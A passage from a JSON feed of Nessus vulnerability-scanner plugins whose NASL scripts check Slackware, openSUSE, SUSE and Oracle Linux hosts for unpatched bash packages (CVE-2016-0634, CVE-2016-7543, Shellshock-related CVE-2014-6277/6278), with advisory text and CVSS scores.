flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bash\", pkgver:\"4.1.017\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.017\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bash\", pkgver:\"4.2.053\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.053\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bash\", pkgver:\"4.2.053\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.053\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"bash\", pkgver:\"4.3.048\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.3.048\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:20", "description": "This update for bash fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2016-7543: A code execution possibility via SHELLOPTS+PS4 variable was fixed (bsc#1001299)\n\n - CVE-2016-0634: Arbitrary code execution via malicious hostname was fixed (bsc#1000396)\n\nNon-security issues fixed :\n\n - Fix repeating self-calling of traps due the combination of a non-interactive shell, a trap handler for SIGINT, an external process in the trap handler, and a SIGINT within the trap after the external process runs.\n (bsc#1086247)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-2018-516)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-516.NASL", "href": "https://www.tenable.com/plugins/nessus/110106", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-516.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110106);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-2018-516)\");\n script_summary(english:\"Check for the openSUSE-2018-516 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bash fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2016-7543: A code execution possibility via\n SHELLOPTS+PS4 variable was fixed (bsc#1001299)\n\n - CVE-2016-0634: Arbitrary code execution via malicious\n hostname was fixed (bsc#1000396)\n\nNon-security issues fixed :\n\n - Fix repeating self-calling of traps due the combination\n of a non-interactive shell, a trap handler for SIGINT,\n an external process in the trap handler, and a SIGINT\n within the trap after the external process runs.\n (bsc#1086247)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1000396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1001299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1086247\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bash-4.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bash-debuginfo-4.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bash-debugsource-4.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bash-devel-4.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bash-lang-4.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bash-loadables-4.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bash-loadables-debuginfo-4.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libreadline6-6.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libreadline6-debuginfo-6.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"readline-devel-6.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.3-83.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.3-83.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:21", "description": "This update for bash fixes the following issues: Security issues fixed :\n\n - CVE-2016-7543: A code execution possibility via SHELLOPTS+PS4 variable was fixed (bsc#1001299)\n\n - CVE-2016-0634: Arbitrary code execution via malicious hostname was fixed (bsc#1000396) Non-security issues fixed :\n\n - Fix repeating self-calling of traps due the combination of a non-interactive shell, a trap handler for SIGINT, an external process in the trap handler, and a SIGINT within the trap after the external process runs.\n (bsc#1086247)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-24T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : bash (SUSE-SU-2018:1398-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bash", "p-cpe:/a:novell:suse_linux:bash-debuginfo", "p-cpe:/a:novell:suse_linux:bash-debugsource", "p-cpe:/a:novell:suse_linux:libreadline6", "p-cpe:/a:novell:suse_linux:libreadline6-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-1398-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110092", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1398-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110092);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : bash (SUSE-SU-2018:1398-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for bash fixes the following issues: Security issues \nfixed :\n\n - CVE-2016-7543: A code execution possibility via\n SHELLOPTS+PS4 variable was fixed (bsc#1001299)\n\n - CVE-2016-0634: Arbitrary code execution via malicious\n hostname was fixed (bsc#1000396) Non-security issues\n fixed :\n\n - Fix repeating self-calling of traps due the combination\n of a non-interactive shell, a trap handler for SIGINT,\n an external process in the trap handler, and a SIGINT\n within the trap after the external process runs.\n (bsc#1086247)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1000396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1001299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1086247\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0634/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7543/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181398-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e2ee9208\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-977=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2018-977=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-977=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-977=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-977=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-977=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-977=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2018-977=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2018-977=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"bash-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"bash-debuginfo-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"bash-debugsource-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libreadline6-32bit-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libreadline6-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libreadline6-debuginfo-32bit-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libreadline6-debuginfo-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"bash-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"bash-debuginfo-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"bash-debugsource-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libreadline6-32bit-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libreadline6-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libreadline6-debuginfo-32bit-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libreadline6-debuginfo-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bash-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bash-debugsource-4.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreadline6-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.3-83.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-6.3-83.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:48:01", "description": "Description of changes:\n\n[4.2.45-5.4.0.1]\n- Fix segfaults from CVE-2014-6277 and CVE-2014-6278 completely. [orabug 19905256]", "cvss3": {"score": null, "vector": null}, "published": "2014-11-21T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : bash (ELSA-2014-3092) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6277", "CVE-2014-6278"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2014-3092.NASL", "href": "https://www.tenable.com/plugins/nessus/79374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3092.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79374);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-6278\");\n script_bugtraq_id(70165, 70166);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Oracle Linux 7 : bash (ELSA-2014-3092) (Shellshock)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.2.45-5.4.0.1]\n- Fix segfaults from CVE-2014-6277 and CVE-2014-6278 completely. [orabug \n19905256]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-November/004662.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4.0.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:48:01", "description": "Description of changes:\n\n[4.1.2-29.0.1]\n- Fix segfaults from CVE-2014-6277 and CVE-2014-6278 completely. [orabug 19905294]", "cvss3": {"score": null, "vector": null}, "published": "2014-11-21T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : bash (ELSA-2014-3093) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6277", "CVE-2014-6278"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2014-3093.NASL", "href": "https://www.tenable.com/plugins/nessus/79375", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3093.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79375);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-6278\");\n script_bugtraq_id(70165, 70166);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Oracle Linux 6 : bash (ELSA-2014-3093) (Shellshock)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n 